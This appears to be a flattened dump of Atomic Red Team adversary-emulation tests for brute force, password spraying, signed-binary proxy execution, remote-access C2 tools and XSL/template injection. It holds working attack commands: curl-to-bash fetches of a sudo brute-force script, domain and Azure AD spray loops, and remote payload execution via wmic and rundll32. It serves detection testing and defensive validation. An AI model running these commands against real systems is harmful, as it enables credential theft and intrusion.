if (test-path "..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Prereq: bruteuser.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\bruteuser.txt"){exit 0} else {exit 1}
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - Debian
useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art su -c "cd /tmp; curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh | bash" art
Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
Prereq: Check if running on a Debian based machine.
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
userdel -fr art
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - Redhat
useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art su art cd /tmp curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash
Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
Prereq: Check if running on a Redhat based machine.
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
Cleanup:
userdel -fr art
T1110.001 - Brute Force: Password Guessing
SUDO Brute Force - FreeBSD
pw adduser art -g wheel -s /bin/sh echo "password123" | pw usermod art -h 0 su art cd /tmp curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh |bash
Description: An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user.
This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user
Prereq: Check if running on a FreeBSD based machine.
if grep -iq "FreeBSD" /etc/os-release; then echo "FreeBSD"; else echo "NOT FreeBSD"; exit 1; fi if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi if [ -x "$(command -v bash)" ]; then echo "bash is installed"; else echo "bash is NOT installed"; exit 1; fi
Description: An adversary may attempt to brute force the password of privilleged account for privilege escalation.
In the process, the TA may lock the account, which can be used for detection. [Reference](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/#:~:text=A%20ransomware%20group%20attacking%20large,internal%20systems%20after%20establishing%20a)
Prereq: The plink executable must be found in the ExternalPayloads folder.
if (Test-Path "..\ExternalPayloads\plink.exe") {exit 0} else {exit 1}
T1110.002 - Brute Force: Password Cracking
Password Cracking with Hashcat
cd ..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe\.. ..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe -a 0 -m 1000 -r .\rules\Incisive-leetspeak.rule T1110.002\src\sam.txt T1110.002\src\password.lst
Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against
Prereq: Hashcat must exist on disk at specified location (..\ExternalPayloads\hashcat6\hashcat-6.1.1\hashcat.exe)
del "..\ExternalPayloads\hashcat6.7z" >nul 2>&1 del "..\ExternalPayloads\7z1900.exe" >nul 2>&1 del "..\ExternalPayloads\7z" /Q /S >nul 2>&1 del "..\ExternalPayloads\hashcat-unzip" /Q /S >nul 2>&1
T1110.003 - Brute Force: Password Spraying
Password Spray all Domain Users
@FOR /F %n in (%temp%\users.txt) do @echo | set/p=. & @net use %logonserver%\IPC$ /user:"%userdomain%\%n" "Spring2020" 1>NUL 2>&1 && @echo [*] %n:Spring2020 && @net use /delete %logonserver%\IPC$ > NUL
Description: CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently.
This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray.
Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt.
See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5
Prereq: List of domain users to password spray must exits at %temp%\users.txt
Description: Perform a domain password spray using the DomainPasswordSpray tool. It will try a single password against all users in the domain
https://github.com/dafthack/DomainPasswordSpray
T1110.003 - Brute Force: Password Spraying
Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)
if ("NTLM".ToLower() -NotIn @("ntlm","kerberos")) { Write-Host "Only 'NTLM' and 'Kerberos' auth methods are supported" exit 1 }
$credz = new-object System.Net.NetworkCredential($user, $password, "$env:UserDnsDomain") $conn = new-object System.DirectoryServices.Protocols.LdapConnection($di, $credz, [System.DirectoryServices.Protocols.AuthType]::NTLM) try { Write-Host " [-] Attempting ${password} on account ${user}." $conn.bind() # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] ${user}:${password} are valid credentials!" } catch { Write-Host $_.Exception.Message } } Write-Host "End of password spraying"
Description: Attempt to brute force all Active Directory domain users with a single password (called "password spraying") on a domain controller, via LDAP, with NTLM or Kerberos
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user (to fetch the list of all domain users)
T1110.003 - Brute Force: Password Spraying
Password spray all Azure AD users with a single password
$Users | Foreach-Object { $user = $_.UserPrincipalName $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "$user", $Pword try { Write-Host " [-] Attempting P@ssw0rd! on account ${user}." Connect-AzureAD -Credential $Credential 2>&1> $null # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success Write-Host " [!] ${user}:P@ssw0rd! are valid credentials!`r`n" Disconnect-AzureAD > $null } catch { Write-Host " [-] ${user}:P@ssw0rd! invalid credentials.`r`n" } } Write-Host "End of password spraying"
Description: Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module.
Valid credentials are only needed to fetch the list of Azure AD users.
Description: DomainPasswordSpray Attacks technique via function of WinPwn
T1110.003 - Brute Force: Password Spraying
Password Spray Invoke-DomainPasswordSpray Light
function Invoke-dpsLight ($Password, $userlist) { $users = Get-Content $userlist $Domain = "LDAP://" + ([ADSI]"").distinguishedName foreach ($User in $users) { $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password) if ($Domain_check.name -ne $null) { Write-Host -ForegroundColor Green "Password found for User:$User Password:$Password" } else { Write-Host ". " -NoNewline} } Write-Host -ForegroundColor green "Finished" } Invoke-dpsLight "Spring2020" $env:Temp\usersdpsLight.txt
Description: Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray)
but without all the extra code that makes the script get blocked by many AVs.
This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually
or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.
Prereq: Username file must exist at $env:Temp\usersdpsLight.txt
if (Test-Path $env:Temp\usersdpsLight.txt) {exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)
Description: This test attempts to brute force a list of Microsoft Online (Azure/O365) users with a single password via the MSOLSpray Powershell module.
Prereq: MSOLSpray module must exist in PathToAtomicsFolder\..\ExternalPayloads.
if (test-path "..\ExternalPayloads\MSOLSpray.ps1"){exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
Password Spray using Kerbrute Tool
cd "..\ExternalPayloads" .\kerbrute.exe passwordspray --dc $ENV:userdnsdomain -d $ENV:userdomain "..\ExternalPayloads\passwordspray.txt" password132
Description: Test a single password against a list of users
Prereq: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
Prereq: passwordspray.txt must exist in PathToAtomicsFolder\..\ExternalPayloads
if (test-path "..\ExternalPayloads\passwordspray.txt"){exit 0} else {exit 1}
T1110.003 - Brute Force: Password Spraying
AWS - Password Spray an AWS using GoAWSConsoleSpray
cd /tmp git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git cd /tmp/GoAWSConsoleSpray go run main.go GoAWSConsoleSpray -a XXXXXXXX -u T1110.003/src/aws_users.txt -p T1110.003/src/aws_passwords.txt
Description: GoAWSConsoleSpray is a tool that can be used to spray AWS IAM Console Credentials in order to identify a valid login for a user account built by WhiteOakSecurity. For more details reagrding the tool, check - https://www.whiteoaksecurity.com/blog/goawsconsolespray-password-spraying-tool/
Description: Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
Description: Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
Description: Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
Description: Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
Description: Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
Description: Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
Prereq: The DLL must exist on disk at specified location (T1218.007\bin\MSIRunner.dll)
if (Test-Path "T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}
T1218.007 - Signed Binary Proxy Execution: Msiexec
Msiexec.exe - Execute the DllUnregisterServer function of a DLL
Description: Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: the DLL included in the "bin" folder is only built for 64-bit, so this won't work on a 32-bit OS.
Prereq: The DLL must exist on disk at specified location (T1218.007\bin\MSIRunner.dll)
if (Test-Path "T1218.007\bin\MSIRunner.dll") {exit 0} else {exit 1}
T1218.007 - Signed Binary Proxy Execution: Msiexec
Description: Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI executes a built-in JScript payload that launches powershell.exe.
T1218.008 - Signed Binary Proxy Execution: Odbcconf
Description: Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed
along with other information about the assembly being installed.
Prereq: The CSharp source file must exist on disk at specified location (T1218.009\src\T1218.009.cs)
if (Test-Path "T1218.009\src\T1218.009.cs") {exit 0} else {exit 1}
Description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable
windows defender real-time protection to fix it. Upon execution, calc.exe will be launched.
T1218.010 - Signed Binary Proxy Execution: Regsvr32
Description: Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer.
Prereq: AllTheThingsx86.dll must exist on disk at specified location (T1218.010\bin\AllTheThingsx86.dll)
if (Test-Path "T1218.010\bin\AllTheThingsx86.dll") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute JavaScript Remote Payload With GetObject
Description: Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
This has been used by Win32/Poweliks malware and works as described [here](https://www.stormshield.com/news/poweliks-command-line-confusion/)
Note: The GetObject function is no longer supported in Internet Explorer v9 (2011) and later so this technique would only work where very old versions of IE are installed.
Cleanup:
taskkill /IM notepad.exe /f
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute VBscript command using Ordinal number
Description: Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test.
Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/
Upon execution calc.exe will be launched
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with advpack.dll.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml
Upon execution calc.exe will be launched
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011.inf")
if (Test-Path "T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with ieadvpack.dll.
Upon execution calc.exe will be launched
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011.inf")
if (Test-Path "T1218.011\src\T1218.011.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011_DefaultInstall.inf")
if (Test-Path "T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml
Prereq: Inf file must exist on disk at specified location ("T1218.011\src\T1218.011_DefaultInstall.inf")
if (Test-Path "T1218.011\src\T1218.011_DefaultInstall.inf") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Execution of HTA and VBS Files using Rundll32 and URL.dll
Description: IcedID uses this TTP as follows:
rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta
Trickbot uses this TTP as follows:
rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs
In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript"
T1218.011 - Signed Binary Proxy Execution: Rundll32
Launches an executable using Rundll32 and pcwutl.dll
Description: Rundll32.exe loading an executable renamed as .scr using desk.cpl
Reference:
- [LOLBAS - Libraries/Desk](https://lolbas-project.github.io/lolbas/Libraries/Desk/)
SIGMA rules:
- [SCR File Write Event](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/file_event/file_event_win_new_src_file.yml)
- [Rundll32 InstallScreenSaver Execution](https://github.com/SigmaHQ/sigma/blob/b53f08b081e0a50099be9b9e8eced82097fdbaf2/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)
Cleanup:
del not_an_scr.scr
T1218.011 - Signed Binary Proxy Execution: Rundll32
Running DLL with .init extension and function
rundll32.exe T1218.011\bin\_WT.init,krnl
Description: This test, based on common Gamarue tradecraft, consists of a DLL file with a .init extension being run by rundll32.exe. When this DLL file's 'krnl' function is called, it launches a Windows pop-up.
DLL created with the AtomicTestHarnesses Portable Executable Builder script.
Prereq: The DLL file to be called must exist at the specified location (T1218.011\bin\_WT.init)
if (Test-Path "T1218.011\bin\_WT.init") {exit 0} else {exit 1}
T1218.011 - Signed Binary Proxy Execution: Rundll32
Rundll32 execute command via FileProtocolHandler
rundll32.exe url.dll,FileProtocolHandler calc.exe
Description: Test execution of a command using rundll32.exe and the FileProtocolHandler technique.
Upon execution, calc.exe will be launched.
This technique is documented by Levan Abesadze - https://medium.com/@Wolverineisstillalive/system-binary-proxy-execution-rundll32-bypass-method-790871e1f2b7
T1218.011 - Signed Binary Proxy Execution: Rundll32
Description: Launch an executable payload by calling RouteTheCall. Test execution of a command using rundll32.exe to execute a payload{calc.exe} by calling RouteTheCall. Upon execution, calc.exe will be launched.
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Zipfldr.yml
Description: Test execution of a .inf using InfDefaultInstall.exe
Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml
Prereq: INF file must exist on disk at specified location (T1218\src\Infdefaultinstall.inf)
if (Test-Path "T1218\src\Infdefaultinstall.inf") {exit 0} else {exit 1}
T1218 - Signed Binary Proxy Execution
ProtocolHandler.exe Downloaded a Suspicious File
FOR /F "tokens=2*" %a in ('reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Winword.exe" /V PATH') do set microsoft_wordpath=%b call "%microsoft_wordpath%\protocolhandler.exe" "ms-word:nft|u|https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx"
Description: Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.
Description: RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).
One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.
Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the "Disable" argument to RemoteFXvGPUDisablement.exe.
The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.
Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1
Prereq: The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.
$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable if (-not $RequiredModule) {exit 1} if (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}
Description: Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
Prereq: txt file must exist on disk at specified location (T1218\src\T1218.txt)
if (Test-Path "T1218\src\T1218.txt") {exit 0} else {exit 1}
Prereq: DiskShadow.exe must exist on disk at specified location (C:\Windows\System32\diskshadow.exe)
if (Test-Path C:\Windows\System32\diskshadow.exe) {exit 0} else {exit 1}
T1218 - Signed Binary Proxy Execution
Load Arbitrary DLL via Wuauclt (Windows Update Client)
Description: This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched.
See https://dtm.uk/wuauclt/
Prereq: DLL to load must exist on disk as specified location (T1218\bin\calc.dll)
if (test-path "T1218\bin\calc.dll"){exit 0} else {exit 1}
Cleanup:
taskkill /f /im calculator.exe > nul 2>&1
T1218 - Signed Binary Proxy Execution
Lolbin Gpscript logon option
Gpscript /logon
Description: Executes logon scripts configured in Group Policy.
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
T1218 - Signed Binary Proxy Execution
Lolbin Gpscript startup option
Gpscript /startup
Description: Executes startup scripts configured in Group Policy
https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Description: Executes commands from a specially prepared ie4uinit.inf file.
Poc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Reference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/
Prereq: ieuinit.inf must exist on disk at specified location (T1218\src\ieuinit.inf)
if (Test-Path "T1218\src\ieuinit.inf") {exit 0} else {exit 1}
Cleanup:
del %TEMP%\ie4uinit.exe >nul 2>&1 del %TEMP%\ieuinit.inf >nul 2>&1
Description: This test simulates an adversary copying `customshellhost.exe` and `calc.exe` from `C:\windows\system32\` to `C:\temp\`, renaming `calc.exe` to `explorer.exe`.
Upon execution, customshellhost.exe will spawn calc.exe.
Note this will only work on Windows 10 or 11.
[LOLBAS](https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/)
[BishopFox](https://bishopfox.com/blog/edr-bypass-with-lolbins)
Cleanup:
Remove-Item -Path C:\test -Recurse -Force
T1218 - Signed Binary Proxy Execution
Provlaunch.exe Executes Arbitrary Command via Registry Key
Description: Provlaunch.exe executes a command defined in the Registry. This test will create the necessary registry keys and values, then run provlaunch.exe to execute an arbitrary command.
- https://twitter.com/0gtweet/status/1674399582162153472
- https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/
Registry keys are deleted after successful execution.
Description: Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
Description: An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed.
Description: An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed.
Description: An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed.
Description: An adversary may attempt to trick the user into downloading GoToAssist and use to establish C2. Download of GoToAssist installer will be at the destination location and ran when sucessfully executed.
Cleanup:
try{"$T1219/bin/GoToCleanup.ps1"} catch{}
T1219 - Remote Access Software
ScreenConnect Application Download and Install on Windows
Description: An adversary may attempt to trick the user into downloading ScreenConnect for use as a C2 channel. Download of ScreenConnect installer will be in the Downloads directory.
Msiexec will be used to quietly insall ScreenConnect.
Description: An adversary may attempt to trick the user into downloading Ammyy Admin Remote Desktop Software for use as a C2 channel.
Upon successful execution, Ammyy Admin will be executed.
Prereq: Ammyy Admin must exist on disk at the specified location (..\ExternalPayloads\ammyy.exe)
if (Test-Path "..\ExternalPayloads\ammyy.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading RemotePC Software for use as a C2 channel.
Upon successful execution, RemotePC will be executed.
Prereq: RemotePC must exist on disk at the specified location (..\ExternalPayloads\RemotePC.exe)
if (Test-Path "..\ExternalPayloads\RemotePC.exe") {exit 0} else {exit 1}
Description: A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as NetSupport to provide the operator with access to the network using legitimate services.
Prereq: NetSupport must be downloaded and exist on the disk at the specified location. (..\ExternalPayloads\T1219_NetSupport.exe)
if (Test-Path "..\ExternalPayloads\T1219_NetSupport.exe") {exit 0} else {exit 1}
Description: A recent trend by threat actors, once a foothold is established, maintain long term persistence using third party remote services such as UltraViewer to provide the operator with access to the network using legitimate services.
Prereq: Ultraviewer installer must be downloaded and exist on the disk at the specified location. (..\ExternalPayloads\T1219_UltraViewer.exe)
if (Test-Path "..\ExternalPayloads\T1219_UltraViewer.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading UltraVNC for use as a C2 channel.
Upon successful execution, UltraVNC will be executed.
Prereq: UltraVNC must exist at ($env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe')
if (Test-Path $env:ProgramFiles\'uvnc bvba\UltraVnc\vncviewer.exe') {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading MSP360 Connect for use as a C2 channel.
Upon successful execution, MSP360 Connect will be executed.
Prereq: MSP360 must exist at ($env:ProgramFiles\Connect\Connect.exe)
if (Test-Path $env:ProgramFiles\Connect\Connect.exe) {exit 0} else {exit 1}
Description: An adversary may attempt to trick the user into downloading RustDesk and use this to maintain access to the machine.
Download of RustDesk installer will be at the destination location when successfully executed.
Start-Process "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe"
Description: An adversary may attempt to trick the user into downloading Splashtop for use as a C2 channel.
Upon successful execution, Splashtop will be executed.
Prereq: Splashtop must exist at "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe"
if (Test-Path "${env:programfiles(x86)}\Splashtop\Splashtop Remote\Client for STP\strwinclt.exe") {exit 0} else {exit 1}
Description: An adversary may attempt to use Splashtop Streamer to gain unattended remote interactive access. Upon successful execution, Splashtop streamer will be executed.
Prereq: Splashtop Streamer must be installed in the location
Description: Executes the code specified within a XSL script tag during XSL transformation using a local payload.
Requires download of MSXSL. No longer available from Microsoft.
(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Open Calculator.exe when test successfully executed, while AV turned off.
Prereq: XML file must exist on disk at specified location (T1220\src\msxslxmlfile.xml)
if (Test-Path "T1220\src\msxslxmlfile.xml") {exit 0} else {exit 1}
Prereq: XSL file must exist on disk at specified location (T1220\src\msxslscript.xsl)
if (Test-Path "T1220\src\msxslscript.xsl") {exit 0} else {exit 1}
Prereq: msxsl.exe must exist on disk at specified location (..\ExternalPayloads\msxsl.exe)
if (Test-Path "..\ExternalPayloads\msxsl.exe") {exit 0} else {exit 1}
Description: Executes the code specified within a XSL script tag during XSL transformation using a remote payload.
Requires download of MSXSL.exe. No longer available from Microsoft.
(Available via Internet Archive https://web.archive.org/web/20200825011623/https://www.microsoft.com/en-us/download/details.aspx?id=21714 )
Open Calculator.exe when test successfully executed, while AV turned off.
Prereq: msxsl.exe must exist on disk at specified location ("..\ExternalPayloads\msxsl.exe")
if (Test-Path "..\ExternalPayloads\msxsl.exe") {exit 0} else {exit 1}
Cleanup:
del -Path ..\ExternalPayloads\msxsl.exe >nul 2>&1
T1220 - XSL Script Processing
WMIC bypass using local XSL file
wmic process list /FORMAT:"T1220\src\wmicscript.xsl"
Description: Executes the code specified within a XSL script using a local payload.
Prereq: XSL file must exist on disk at specified location (T1220\src\wmicscript.xsl)
if (Test-Path "T1220\src\wmicscript.xsl") {exit 0} else {exit 1}
T1220 - XSL Script Processing
WMIC bypass using remote XSL file
wmic process list /FORMAT:"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl"
Description: Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test successfully executed, while AV turned off.
T1221 - Template Injection
WINWORD Remote Template Injection
start "T1221\src\Calculator.docx"
Description: Open a .docx file that loads a remote .dotm macro enabled template from https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1221/src/opencalc.dotm
Executes the code specified within the .dotm template.
Requires download of WINWORD found in Microsoft Ofiice at Microsoft: https://www.microsoft.com/en-us/download/office.aspx.
Default docs file opens Calculator.exe when test sucessfully executed, while AV turned off.
T1222.001 - File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Take ownership using takeown utility
takeown.exe /f %temp%\T1222.001_takeown_folder /r
Description: Modifies the filesystem permissions of the specified file or folder to take ownership of the object. Upon execution, "SUCCESS" will
be displayed for the folder and each file inside of it.
